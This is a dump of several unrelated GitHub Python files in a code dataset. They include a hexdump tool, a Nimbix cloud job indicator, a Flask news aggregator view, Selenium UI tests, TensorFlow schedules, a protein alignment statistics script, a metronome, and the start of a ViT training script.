1.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70800001093","text":"import sys\n\n# flake8: noqa\n\n#To run this program, enter into the command line: 'python hexdump.py filename'\n#For example, for hi.txt, type: 'python hexdump.py hi.txt'\n\ndef main():\n data = openAndReadFile()\n dataLC = determinePrinatableAscii(data)\n printHexOutput(data, dataLC)\n\n\ndef openAndReadFile():\n fd = open(sys.argv[1], \"rb\")\n data = fd.read()\n #print(len(data))\n return data\n\ndef determinePrinatableAscii(data):\n dataListCopy = []\n # determine if a character is printable ascii\n for el in data:\n # if it is, then append it to the list so that it may be printed\n if int(hex(el), 16) >= int(hex(32), 16) and int(hex(el), 16) <= int(hex(126), 16):\n dataListCopy.append(chr(el))\n # else the character is not printable ascii, so append a period in it's place\n else:\n dataListCopy.append(\".\")\n return dataListCopy\n\ndef printHexOutput(d, dLC):\n d = list(d)\n dataListCopyHex = []\n for el in d:\n dataListCopyHex.append(f\"{el:x}\".rjust(2, \"0\"))\n\n for i in range(len(dataListCopyHex)):\n if i % 16 == 0:\n if len(dataListCopyHex) - i > 15:\n print(\"{:08x}\".format(i), end=\" \")\n print(\" \".join(dataListCopyHex[i: i + 8]), end=\" \")\n print(\" \".join(dataListCopyHex[i + 8: i + 16]), end=\" \")\n print(\"|\" + \"\".join(dLC[i: i + 16]) + \"|\")\n else:\n length = len(\n \"{:08x}\".format(i)\n + \" \"\n + \" 
\".join(dataListCopyHex[i: i + 8])\n + \" \".join(dataListCopyHex[i + 8: i + 16])\n )\n print(\n \"{:08x}\".format(i)\n + \" \"\n + \" \".join(dataListCopyHex[i: i + 8])\n + \" \"\n + \" \".join(dataListCopyHex[i + 8: i + 16]),\n end=\"\",\n )\n print(\"|\".rjust(59 - length), end=\"\")\n print(\"\".join(dLC[i: i + 16]) + \"|\")\n if len(dLC) - 1 == i:\n print(\"{:08x}\".format(i + 1), end=\"\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TBuckets6/hexdump-implementation","sub_path":"hexdump.py","file_name":"hexdump.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39451309613","text":"# based on https://bitbucket.org/cpbotha/indicator-cpuspeed/src\n\n# work in progress...\n\n# to run it, you'll need to, after installgin your env3 virtualenv:\n# pushd env3/lib/python3.5/site-packages\n# ln -s /usr/lib/python3/dist-packages/gi/ .\n# popd\n\nfrom __future__ import print_function, division\nfrom os import path\nfrom os.path import join\nimport os.path\nimport traceback\nimport yaml\nimport sys\nimport argparse\nimport requests\nimport json\nimport subprocess\nfrom gi.repository import Gtk, GLib\n\ntry: \n from gi.repository import AppIndicator3 as AppIndicator \nexcept: \n from gi.repository import AppIndicator\n\nimport re\nimport jobs\nimport launch\n\nscript_dir = path.dirname(path.realpath(__file__))\napi_url = 'https://api.jarvice.com/jarvice'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--configfile', default=join(script_dir, 'nimbix.yaml'))\nparser.add_argument('--iconfile')\nargs = parser.parse_args()\nwith open(args.configfile, 'r') as f:\n config = yaml.load(f)\n\nusername = config['username']\napikey = config['apikey']\nssh_command = config['ssh_command']\nlaunch_profiles = config.get('launch_profiles', {})\nprint('launch_profiles', launch_profiles)\n\nclass IndicatorCPUSpeed(object):\n def __init__(self):\n # param1: identifier of this indicator\n # param2: name of icon. this will be searched for in the standard them\n # dirs\n # finally, the category. 
We're monitoring CPUs, so HARDWARE.\n self.ind = AppIndicator.Indicator.new(\n \"indicator-cpuspeed\", \n \"onboard-mono\",\n AppIndicator.IndicatorCategory.HARDWARE)\n if args.iconfile is not None:\n theme_path = path.dirname(args.iconfile)\n icon = path.basename(args.iconfile).split('.')[0]\n print('theme_path', theme_path, 'icon', icon)\n self.ind.set_icon_theme_path(theme_path)\n self.ind.set_icon(icon)\n \n# self.ind.set_icon_theme_path(join(script_dir, 'img'))\n# self.ind.set_icon('nimbix')\n\n # some more information about the AppIndicator:\n # http://developer.ubuntu.com/api/ubuntu-12.04/python/AppIndicator3-0.1.html\n # http://developer.ubuntu.com/resources/technologies/application-indicators/\n\n # need to set this for indicator to be shown\n self.ind.set_status (AppIndicator.IndicatorStatus.ACTIVE)\n\n # have to give indicator a menu\n self.menu = Gtk.Menu()\n\n # you can use this menu item for experimenting\n item = Gtk.MenuItem()\n item.set_label(\"Poll\")\n item.connect(\"activate\", self.handler_menu_test)\n item.show()\n self.menu.append(item)\n\n # this is for exiting the app\n item = Gtk.MenuItem()\n item.set_label(\"Exit\")\n item.connect(\"activate\", self.handler_menu_exit)\n item.show()\n self.menu.append(item)\n\n for launch_profile in launch_profiles:\n image = launch_profile['image']\n instancetype = launch_profile['type']\n name = launch_profile['name']\n item = Gtk.MenuItem()\n item.set_label(\"Launch %s\" % name)\n item.target_image = image\n item.target_type = instancetype\n item.connect(\"activate\", self.handler_instance_launch)\n item.show()\n self.menu.insert(item, 0)\n\n self.menu.show()\n self.ind.set_menu(self.menu)\n\n # initialize cpu speed display\n self.instance_items = []\n self.update_cpu_speeds()\n # then start updating every 2 seconds\n # http://developer.gnome.org/pygobject/stable/glib-functions.html#function-glib--timeout-add-seconds\n GLib.timeout_add_seconds(180, self.handler_timeout)\n \n def handler_poll_onetime(self):\n self.update_cpu_speeds()\n return False\n\n def handler_menu_exit(self, evt):\n Gtk.main_quit()\n\n def handler_menu_test(self, evt):\n # we can change the icon at any time\n# self.ind.set_icon(\"indicator-messages-new\")\n self.update_cpu_speeds()\n\n def handler_timeout(self):\n \"\"\"This will be called every few seconds by the GLib.timeout.\n \"\"\"\n self.update_cpu_speeds()\n # return True so that we get called again\n # returning False will make the timeout stop\n return True\n\n def handler_instance_launch(self, evt):\n self.instance_launch(evt.target_image, evt.target_type)\n\n def handler_instance_ssh(self, evt):\n self.instance_ssh(evt.job_number, evt.target_image)\n\n def handler_instance_kill(self, evt):\n self.instance_kill(evt.job_number, evt.target_image)\n\n def instance_launch(self, image, instancetype):\n launch.launch(config, image, instancetype)\n GLib.timeout_add_seconds(10, self.handler_poll_onetime)\n\n def instance_ssh(self, job_number, target_image):\n res = requests.get('%s/connect?username=%s&apikey=%s&number=%s' % (api_url, username, apikey, job_number))\n res = json.loads(res.content.decode('utf-8'))\n ip_address = res['address']\n subprocess.Popen(ssh_command.format(\n ip_address=ip_address,\n image=target_image\n ).split())\n\n def instance_kill(self, job_number, target_image):\n res = requests.get('%s/shutdown?username=%s&apikey=%s&number=%s' % (api_url, username, apikey, job_number))\n res = json.loads(res.content.decode('utf-8'))\n GLib.timeout_add_seconds(10, 
self.handler_poll_onetime)\n\n def update_cpu_speeds(self):\n label = 'failed'\n try:\n jobslist = jobs.get_jobs(config)\n label = ''\n for item in self.instance_items:\n self.menu.remove(item)\n self.instance_items.clear()\n for job in jobslist:\n if label != '':\n label += ' '\n if job['status'] in ['SUBMITTED']:\n label += '(' + job['type'] + ')'\n GLib.timeout_add_seconds(10, self.handler_poll_onetime) # fast poll whilst wait for it to start\n else:\n label += job['type']\n\n item = Gtk.MenuItem()\n item.set_label('ssh to %s' % job['image'])\n item.connect(\"activate\", self.handler_instance_ssh)\n item.target_image = job['image']\n item.job_number = job['number']\n item.show()\n self.menu.insert(item, 0)\n self.instance_items.append(item)\n\n item = Gtk.MenuItem()\n item.set_label('kill %s' % job['image'])\n item.connect(\"activate\", self.handler_instance_kill)\n item.target_image = job['image']\n item.job_number = job['number']\n item.show()\n self.menu.insert(item, 0)\n self.instance_items.append(item)\n\n except Exception as e:\n label = 'exception occurred'\n try:\n print(traceback.format_exc())\n except:\n print('exception in exception :-P')\n self.ind.set_label(label, \"\")\n\n def main(self):\n Gtk.main()\n\nif __name__ == \"__main__\":\n ind = IndicatorCPUSpeed()\n ind.main()\n\n","repo_name":"hughperkins/nimbix-admin","sub_path":"ubuntuindicator.py","file_name":"ubuntuindicator.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"9828168989","text":"from flask import Flask, render_template, Blueprint\nfrom requests.exceptions import HTTPError\n\nfrom modules.BBCScraper import BBCScraper\nfrom modules.MaanScraper import MaanNewsScraper\nfrom modules.RTScraper import RTScraper\nfrom modules.WafaScraper import WafaScraper\nimport time\nimport concurrent.futures\n\n\nnews_blueprint = Blueprint('news', __name__)\n\n\n@news_blueprint.route('/news')\ndef news():\n start = time.perf_counter()\n\n wafa_articles = WafaScraper.get_content()\n maan_articles = MaanNewsScraper.get_content()\n rt_articles = RTScraper.get_content()\n bbc_articles = BBCScraper.get_content()\n\n with concurrent.futures.ThreadPoolExecutor() as executer:\n f1 = executer.submit(WafaScraper.get_content)\n f2 = executer.submit(MaanNewsScraper.get_content)\n f3 = executer.submit(RTScraper.get_content)\n f4 = executer .submit(BBCScraper.get_content)\n wafa_articles = f1.result()\n maan_articles = f2.result()\n rt_articles = f3.result()\n bbc_articles = f4.result()\n finish = time.perf_counter() # end timer\n print(f\"Finished in {round(finish-start,2)} seconds\")\n return render_template(\"news/news.html\",\n wafa_articles=wafa_articles,\n maan_articles=maan_articles,\n rt_articles=rt_articles,\n bbc_articles=bbc_articles)\n\n\n\n","repo_name":"eng-aomar/content_aggergator","sub_path":"views/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27018915262","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\nfrom src.backup_manager.backup_manager import BackupManager\nfrom src.custom_test_case import CustomTestCase\nfrom src.drivers.drivers_provider import DriversProvider\nfrom src.nms_entities.paths_manager import PathsManager\nfrom src.options_providers.options_provider import OptionsProvider, CHROME_CONNECT\n\noptions_path = 
'test_scenarios.web.stations'\nbackup_name = '10000_stations_in_1_network.txt'\n\n\nclass WebStationsCase(CustomTestCase):\n \"\"\"WEB stations interface expected elements: table/graph, filters etc. Included clicks\"\"\"\n\n __author__ = 'dkudryashov'\n __version__ = '4.0.0.27'\n __execution_time__ = 60 # approximate case execution time in seconds\n __express__ = True\n\n @classmethod\n def set_up_class(cls):\n cls.driver = DriversProvider.get_driver_instance(\n OptionsProvider.get_connection(options_path, CHROME_CONNECT),\n driver_id='case_web_stations',\n store_driver=False\n )\n cls.backup = BackupManager()\n cls.backup.apply_backup(backup_name)\n cls.options = OptionsProvider.get_options(options_path)\n cls.buttons = cls.options.get('buttons')\n cls.checkboxes = cls.options.get('checkboxes') # filters checkboxes\n cls.first_select_id = cls.options.get('graph').get('graph_first')\n cls.second_select_id = cls.options.get('graph').get('graph_second')\n\n def test_network(self):\n \"\"\"Network stations interface\"\"\"\n self.check_stations_interface('network')\n\n def test_vno(self):\n \"\"\"Vno stations interface\"\"\"\n self.check_stations_interface('vno')\n self.assertIsNotNone(\n self.driver._get_element_by(By.CLASS_NAME, 'seclist__button'),\n msg=f'Cannot locate Group btn'\n )\n\n def test_controller(self):\n \"\"\"Controller stations interface\"\"\"\n self.check_stations_interface('controller')\n\n def check_stations_interface(self, parent):\n path = PathsManager._OBJECT_STATION.format(parent, 0)\n self.driver.load_data(path)\n for key, value in self.buttons.items():\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, value),\n msg=f'No {key} btn for {parent}'\n )\n self.check_quick_filters()\n self.check_filters()\n self.check_graph()\n\n def check_quick_filters(self):\n for key, value in self.buttons.items():\n if key in ('toggle', 'filters'):\n continue\n next_btn = self.driver._get_element_by(By.ID, value)\n next_btn.click()\n\n def check_graph(self):\n toggle_btn = self.driver._get_element_by(By.ID, self.options.get('buttons').get('toggle'))\n toggle_btn.click()\n\n for key, value in self.options.get('graph').items():\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, value, timeout=2),\n msg=f'No {key} selector (id={value})'\n )\n\n graph_x_sel = self.driver._get_element_by(By.ID, self.options.get('graph').get('graph_x_axis'))\n selector = Select(graph_x_sel)\n for opt in self.options.get('graph_x_options'):\n selector.select_by_visible_text(opt)\n\n graph_y1_sel = self.driver._get_element_by(By.ID, self.options.get('graph').get('graph_first'))\n selector = Select(graph_y1_sel)\n for opt in self.options.get('first_select_options'):\n selector.select_by_visible_text(opt)\n\n graph_y2_sel = self.driver._get_element_by(By.ID, self.options.get('graph').get('graph_second'))\n selector = Select(graph_y2_sel)\n for opt in self.options.get('second_select_options'):\n selector.select_by_visible_text(opt)\n\n def check_filters(self):\n filters_btn = self.driver._get_element_by(By.ID, self.buttons.get('filters'))\n filters_btn.click()\n for c_text, c_id in self.checkboxes.items():\n el = self.driver._get_element_by(By.ID, c_id)\n el.click()\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, self.options.get('filters_apply')),\n msg='No Apply for filters'\n )\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, self.options.get('filters_close')),\n msg='No Close for filters'\n )\n apply_btn = self.driver._get_element_by(By.ID, 
self.options.get('filters_apply'))\n apply_btn.click()\n\n def get_all_filters_ids(self):\n # Has been used once to obtain ver.4.0.0.23 filters\n \"\"\"Get all filters IDs and their respective text\"\"\"\n path = PathsManager._OBJECT_STATION.format('vno', 0)\n self.driver.load_data(path)\n filters = self.driver.driver.find_elements_by_class_name('filtersgroups__group')\n for gr in filters:\n ids = gr.find_elements_by_xpath('*[@id]')\n for i in ids:\n inner_div = i.find_element_by_class_name('filtersgroups__title')\n print(f\"{inner_div.get_attribute('innerHTML')}: {i.get_attribute('id')},\")\n\n def get_graph_options(self):\n # Has been used once to obtain ver.4.0.0.23 graph options\n \"\"\"Get all options in graph selectors\"\"\"\n path = PathsManager._OBJECT_STATION.format('vno', 0)\n self.driver.load_data(path)\n toggle_btn = self.driver._get_element_by(By.ID, self.options.get('buttons').get('toggle'))\n toggle_btn.click()\n\n first_select = self.driver._get_element_by(By.ID, self.first_select_id)\n selector = Select(first_select)\n for op in selector.options:\n print(op.text)\n print('#########################')\n\n second_select = self.driver._get_element_by(By.ID, self.second_select_id)\n selector = Select(second_select)\n for op in selector.options:\n print(op.text)\n","repo_name":"underdark456/test_system","sub_path":"test_scenarios/web/stations/case_web_stations.py","file_name":"case_web_stations.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37312466403","text":"import tensorflow as tf\nimport math\n\n\nclass WarmupExponential(tf.keras.optimizers.schedules.ExponentialDecay):\n def __init__(self, init_lr, decay_steps, decay_rate, staircase=False, warmup_steps=0):\n \"\"\"\n learning rate exponential decay에 learning rate warmup 적용.\n\n ```python\n if steps <= warmup_steps:\n return init_lr * (steps / warmup_steps)\n else:\n exponential = floor(steps / decay_steps) if staircase else steps / decay_steps\n return init_lr * decay_rate ** exponential\n ```\n\n :param init_lr: exponential decay의 초기 lr\n :param decay_steps: decay_rate 지수의 분모\n :param decay_rate: lr을 감소시키는 비율\n :param staircase: decay_rate의 지수를 floor할지 여부. 
적용시 lr은 계단함수\n :param warmup_steps: lr을 0부터 init_lr까지 선형적으로 증가시킬 스텝 수\n \"\"\"\n super(WarmupExponential, self).__init__(\n initial_learning_rate=init_lr,\n decay_steps=decay_steps,\n decay_rate=decay_rate,\n staircase=staircase,\n )\n self.init_lr = init_lr\n self.warmup_steps = warmup_steps\n\n @tf.function\n def __call__(self, steps):\n if tf.math.less_equal(steps, self.warmup_steps):\n return self.init_lr * (steps / self.warmup_steps)\n else:\n return super(WarmupExponential, self).__call__(steps)\n\n\nclass WarmupCosineLRDecay(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self, init_lr, total_batch, warmup_steps=0):\n \"\"\"\n learning rate cosine decay & learning rate warmup\n\n :param init_lr: cosine decay의 초기 lr\n :param total_batch: cosine decay를 적용할 총 스텝 수\n :param warmup_steps: lr을 0부터 init_lr까지 선형적으로 증가시킬 스텝 수\n \"\"\"\n super(WarmupCosineLRDecay, self).__init__()\n self.init_lr = init_lr\n self.T = total_batch - warmup_steps\n self.warmup_steps = warmup_steps\n\n @tf.function\n def __call__(self, steps):\n if tf.math.less_equal(steps, self.warmup_steps):\n return self.init_lr * (steps / self.warmup_steps)\n else:\n steps_after_warmup = steps - self.warmup_steps\n cur_lr = self.init_lr * (1 + tf.math.cos(steps_after_warmup * math.pi / self.T)) / 2\n return cur_lr\n\n\n@tf.function\ndef label_smoothing(one_hot, epsilon=.1, K=10):\n \"\"\"\n one-hot 벡터에 label smoothing 적용\n\n :param one_hot: one-hot 벡터\n :param epsilon: label smoothing 계수\n :param K: one-hot 벡터의 카테고리 수\n :return: label smoothed 벡터\n \"\"\"\n label_smooth = one_hot * ((1 - epsilon) - (epsilon / (K-1)))\n label_smooth += epsilon / (K-1)\n return label_smooth\n\n\n@tf.function\ndef mix_up(img_batch, label_batch, alpha=.2):\n \"\"\"\n 이미지와 레이블에 mixup augmentation 적용\n Beta(alpha, alpha) 분포에서 샘플링한 값을 가중치로 하여 두 이미지, 레이블을 선형 보간.\n\n :param img_batch: 이미지 배치\n :param label_batch: 레이블 배치\n :param alpha: Beta 분포 계수\n :return: mixup된 이미지, 레이블 배치쌍\n \"\"\"\n batch_size = tf.shape(img_batch)[0]\n lambda_ = tf.compat.v1.distributions.Beta(alpha, alpha).sample([batch_size])\n\n lambda_img = tf.reshape(lambda_, (batch_size, 1, 1, 1))\n lambda_label = tf.reshape(lambda_, (batch_size, 1))\n\n perm = tf.random.shuffle(tf.range(batch_size))\n img_batch_shuffle = tf.gather(img_batch, perm, axis=0)\n label_batch_shuffle = tf.gather(label_batch, perm, axis=0)\n\n img_batch_mixup = lambda_img * img_batch + (1-lambda_img) * img_batch_shuffle\n label_batch_mixup = lambda_label * label_batch + (1-lambda_label) * label_batch_shuffle\n\n return img_batch_mixup, label_batch_mixup\n\n\nif __name__ == '__main__':\n # we = WarmupExponential(.1, warmup_steps=5, decay_steps=10, decay_rate=.1, staircase=True)\n # for step in range(0, 60, 5):\n # print('{} steps - lr : {}'.format(step, we(step)))\n\n print(label_smoothing(tf.constant([[0, 0, 0, 1, 0], [1, 0, 0, 0, 0]], dtype=tf.float32), K=5))\n","repo_name":"canlion/deeplearning_study","sub_path":"mixed_precision_training/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29668904119","text":"#Purpose of this script is to read protein MSA of 3K proteins for a given locus,\n# and profile counts of each amino acid, per variety and grouped variety\n\n\nfrom Bio import AlignIO\nimport os\nimport os, shutil, gzip\n\nVAR_MAPPING_FILE = \"3k_pop_details_UTF-8_v3.tsv\"\n\n\n\nvar_to_original_var_name = {}\n\ndef gunzip_file(gzipped_file):\n\n input = 
gzip.GzipFile(gzipped_file, 'rb')\n s = input.read()\n input.close()\n\n gunzipped_output = os.path.splitext(gzipped_file)[0]\n print(\"Unzipping...\" + gzipped_file)\n output = open(gunzipped_output, 'wb')\n output.write(s)\n output.close()\n return gunzipped_output\n\n\ndef read_alignment(alignment_gz_file):\n\n\n #align_handle = gzip.open(alignment_file, \"rt\")\n #for record in SeqIO.parse(handle, \"fasta\"):\n # print(record.id, len(record))\n #handle.close()\n\n #alignment = AlignIO.read(alignment_file, \"fasta\")\n with gzip.open(alignment_gz_file, \"rt\") as fin:\n alignment = AlignIO.read(handle=fin, format=\"fasta\")\n\n number_of_seqs = len(alignment)\n length_of_alignment = len(alignment[0].seq)\n\n #print(\"alen\",length_of_alignment)\n #exit()\n\n amino_acid_subs = {}\n\n for j in range(0, length_of_alignment):\n chars_at_pos_to_varieties = {}\n for i in range(0,number_of_seqs):\n\n current_char=alignment[i].seq[j]\n varieties = []\n if current_char in chars_at_pos_to_varieties:\n varieties = chars_at_pos_to_varieties[current_char]\n\n #LOC_Os01g70270.1_LUBANG PUTI::IRGC 5429-1::[IRIS 313-10513] \n #LOC_Os01g70270.1_QB_604::[CX210] \n #Os05t0392300-02_NIAO YAO::IRGC 5496-1::[IRIS 313-8743] \n description = alignment[i].description\n #if description[0:3] == \"LOC\": #MSU\n # variety_name = description.split(\"_\",2)[2].split(\"<\")[0][:-1].split(\"[\")[0] #grab LUBANG PUTI::IRGC 5429-1::\n #else:\n # variety_name = description.split(\"_\",1)[1].split(\"<\")[0][:-1].split(\"[\")[0]\n\n if description[0:3] == \"LOC\": # MSU\n variety_name = description.split(\"_\",2)[2].split(\" \")[0]\n else:\n variety_name = description.split(\"_\")[1].split(\" \")[0]\n\n\n #Manual fix (\"reference\") also appears but can be safely ignored\n #if variety_name == \"Reference\":\n # variety_name = \"NIPPONBARE::\"\n\n var_to_original_var_name[variety_name] = alignment[i].description\n varieties.append(variety_name)\n chars_at_pos_to_varieties[current_char] = varieties\n\n if len(chars_at_pos_to_varieties.keys()) > 1:\n #print(\"amino acid change found\",repr(chars_at_pos_to_varieties))\n amino_acid_subs[j] = chars_at_pos_to_varieties\n return amino_acid_subs\n\ndef read_variety_group_mapping(mapping_file):\n variety_id_to_group = {}\n\n f = open(mapping_file,\"r\",encoding=\"Latin-1\")\n\n for line in f:\n line = line[:-1]\n #print(line)\n cells = line.split(\"\\t\")\n #var_id = cells[0].split(\"[\")[0] #PADI SIRANDAH KUNING::IRGC 73762-1::[IRIS 313-11904] take up to first [\n var_id = cells[1] #Simpler to get the ID only\n var_group = cells[3]\n variety_id_to_group[var_id] = var_group\n\n return variety_id_to_group\n\n#Count the different variety groups with each sub\ndef count_groups_per_sub(aa_subs,var_to_group,out_file):\n\n f_out = open(out_file,\"w\")\n f_out.write(\"pos,aa,vargroup,count\\n\")\n\n for pos in aa_subs:\n char_to_varieties = aa_subs[pos]\n for aa in char_to_varieties:\n vargroup_to_count = {}\n #print(repr(char_to_varieties[aa]))\n for variety in char_to_varieties[aa]:\n if variety in var_to_group:\n group = var_to_group[variety]\n count = 0\n\n #print(\"group\",group)\n if group in vargroup_to_count:\n count = vargroup_to_count[group]\n count = count + 1\n vargroup_to_count[group] = count # increment counters\n else:\n if variety != \"reference\" and variety != \"Reference\": #Safely ignore\n print(\"variety not found\",variety,\"original name:\",var_to_original_var_name[variety])\n\n\n for vargroup in vargroup_to_count:\n count = vargroup_to_count[vargroup]\n 
#print(pos,aa,vargroup,count)\n f_out.write(str(pos+1)+\",\"+aa+\",\"+vargroup+\",\"+str(count)+\"\\n\") #Positions changed to start counting at 1\n #print(repr(vargroup_to_count))\n print(\"Finished writing to \",out_file)\n\ndef create_MSA_pos_stats(three_k_prot_align_file,out_folder):\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n amino_acid_subs_vars = read_alignment(three_k_prot_align_file)\n var_id_to_group = read_variety_group_mapping(VAR_MAPPING_FILE)\n output_file = out_folder + os.path.basename(three_k_prot_align_file).split(\".\")[0] + \"_stats.csv\"\n count_groups_per_sub(amino_acid_subs_vars, var_id_to_group, output_file)\n\n\n#ALIGNMENT_FILE = \"variety_fasta/ARFs/LOC_Os01g70270.1_proteins_in_varieties.fasta\"\ndef run_tests():\n ALIGNMENT_FILE = \"variety_fasta/ARFs/LOC_Os11g32110.1_proteins_in_varieties.fasta\"\n amino_acid_subs_vars = read_alignment(ALIGNMENT_FILE)\n var_id_to_group = read_variety_group_mapping(VAR_MAPPING_FILE)\n\n output_file = \"temp_alignments_outs/\" + os.path.basename(ALIGNMENT_FILE).split(\".\")[0] + \"_stats.csv\"\n count_groups_per_sub(amino_acid_subs_vars,var_id_to_group,output_file)","repo_name":"andrewrobertjones/rice-snp-ptm-analysis","sub_path":"SNPSeek/Extract_stats_from_protein_alignment.py","file_name":"Extract_stats_from_protein_alignment.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27497328899","text":"import time\nimport wave\nimport pyaudio\n\n\nclass Tick(object):\n\n CHUNK = 1024\n\n def __init__(self, beats_per_min=None, wav_file=None):\n self._beats_per_min = beats_per_min\n\n sound = wave.open(wav_file)\n try:\n player = pyaudio.PyAudio()\n self._stream = player.open(\n format=player.get_format_from_width(sound.getsampwidth()),\n channels=sound.getnchannels(),\n rate=sound.getframerate(),\n output=True)\n self._data = sound.readframes(Tick.CHUNK)\n finally:\n sound.close()\n\n def set_beats_per_min(self, v):\n print(\"bpm={bpm}\".format(bpm=v))\n self._beats_per_min = v\n\n def toc(self):\n before = time.time()\n self._stream.write(self._data)\n after = time.time()\n dt = after - before\n time.sleep(60. / self._beats_per_min - dt)\n\n\ndef start_metronome(beats_per_min, ticks=None, mins=None, speed_up=-1, upper_limit=-1, wav_file='beep.wav'):\n\n tick = Tick(wav_file=wav_file)\n while True:\n\n tick.set_beats_per_min(beats_per_min)\n\n if ticks is not None:\n for x in range(ticks):\n tick.toc()\n\n elif mins is not None:\n start = time.time()\n while True:\n tick.toc()\n now = time.time()\n if (now - start) / 60. 
> mins:\n break\n\n beats_per_min += speed_up\n\n if beats_per_min > upper_limit:\n break","repo_name":"skliarpawlo/tictac","sub_path":"utils/metr.py","file_name":"metr.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26388901124","text":"import os \nimport json\nimport torch\nimport pickle\nimport argparse\nimport numpy as np \nfrom datetime import datetime\nfrom vit_pytorch.modules import ViT, build_head\nfrom vit_pytorch.data import create_loaders\nfrom vit_pytorch.configs import MODEL_CFGS\nfrom vit_pytorch.utils import set_seed, get_num_params, freeze_model, Meter, mkdir, save_model\nfrom vit_pytorch.solver import train_epoch, eval_epoch, get_criterion, get_optimizer, get_scheduler, WarmupScheduler, EarlyStopper\n\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ndef main(args):\n set_seed(args.random_seed)\n\n # prepare data\n print('Create data loaders.')\n train_loader, valid_loader, num_classes = create_loaders(args)\n print('Number of classes : {}.'.format(num_classes))\n print('Training sample : {}.'.format(len(train_loader.dataset)))\n \n if valid_loader is not None:\n print('Validation sample : {}.'.format(len(valid_loader.dataset)))\n\n # build model\n print('Build model.')\n is_build_head = False\n\n if args.model_config in MODEL_CFGS:\n is_build_head = True \n model_config = MODEL_CFGS[args.model_config]\n else:\n with open(args.model_config, 'r') as f:\n model_config = json.load(f)\n\n model = ViT(**model_config)\n\n if args.pretrained_weights is not None:\n model.load_state_dict(torch.load(args.pretrained_weights))\n print('Successfully load pre-trained weights from `{}`'.format(args.pretrained_weights))\n\n if args.freeze_extractor:\n print('Freeze feature extractor weights.')\n freeze_model(model)\n\n if model_config['repr_dim'] is not None:\n repr_dim = model_config['repr_dim']\n else:\n repr_dim = model_config['embed_dim']\n\n if is_build_head:\n model.head = build_head(repr_dim, num_classes)\n\n model.to(args.device)\n\n # init meters\n train_meter = Meter()\n\n if valid_loader is not None:\n valid_meter = Meter()\n\n # get criterion\n assert num_classes > 1\n loss = 'bce' if num_classes == 2 else 'ce'\n criterion = get_criterion(loss).to(args.device)\n\n # get optimizer and schedulers\n optimizer = get_optimizer(model, args) \n warmup_scheduler = WarmupScheduler(optimizer, args.warmup)\n training_scheduler = get_scheduler(optimizer, args)\n\n if args.patient is not None:\n early_stopper = EarlyStopper(args.monitor, args.patient, args.min_delta)\n else:\n early_stopper = None \n\n # output dir\n output_dir = args.output_dir\n\n if output_dir is None:\n output_dir = os.path.join(\n ROOT_DIR, 'results', \n datetime.now().strftime('result_%Y-%m-%d-%H-%M')\n )\n\n mkdir(output_dir)\n \n # training\n best_score = 0\n not_improve_cnt = 0\n\n print('Start training.')\n for epoch in range(args.max_epoch):\n _meter_t = train_epoch(model, train_loader, criterion, optimizer, Meter(), args.device, epoch + 1)\n train_meter.update({'loss': np.mean(_meter_t['loss']), 'acc': np.mean(_meter_t['acc'])})\n\n if valid_loader is not None:\n _meter_v = eval_epoch(model, valid_loader, criterion, Meter(), args.device, epoch + 1)\n valid_meter.update({'loss': np.mean(_meter_v['loss']), 'acc': np.mean(_meter_v['acc'])})\n\n if valid_meter is not None and early_stopper is not None:\n early_stopper.step(np.mean(_meter_v[args.monitor]))\n\n if early_stopper.is_best and 
args.save_best:\n weights_path = os.path.join(output_dir, 'improved_ep{}.pt'.format(str(epoch + 1)))\n save_model(model, weights_path)\n else:\n print('No improved count : {}/{}'.format(early_stopper.not_improved_cnt, args.patient))\n\n if early_stopper.is_early_stop:\n print('Early stop at epoch {}'.format(not_improve_cnt))\n break\n \n # save results \n weights_path = os.path.join(output_dir, 'weights.pt')\n save_model(model, weights_path)\n\n try:\n model_config_path = os.path.join(output_dir, 'model_config.json')\n\n with open(model_config_path, 'w') as f:\n json.dump(model_config, f)\n\n print('Successfully save training history to `{}/`'.format(output_dir))\n\n except Exception as e:\n print(e)\n\n try:\n train_hist_path = os.path.join(output_dir, 'train_history.csv')\n valid_hist_path = os.path.join(output_dir, 'valid_history.csv')\n \n train_meter.to_dataframe().to_csv(train_hist_path, index=False) \n\n if valid_meter is not None:\n valid_meter.to_dataframe().to_csv(valid_hist_path, index=False) \n\n print('Successfully save training history to `{}/*`'.format(output_dir))\n\n except Exception as e:\n print(e)\n\n print('Training process done.')\n \n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser(description='')\n\n # paths\n argparser.add_argument('train_dir', type=str, help='Directory of training data.')\n argparser.add_argument('--valid_dir', type=str, help='Directory of validation data.', default=None)\n argparser.add_argument('--valid_rate', type=str, help='Proportion of validation sample splitted from training data.', default=None) \n argparser.add_argument('--output_dir', type=str, help='Output directory.', default=None)\n\n # model\n argparser.add_argument('--model_config', type=str, help='Modle arch configuration. (config path or arch name, 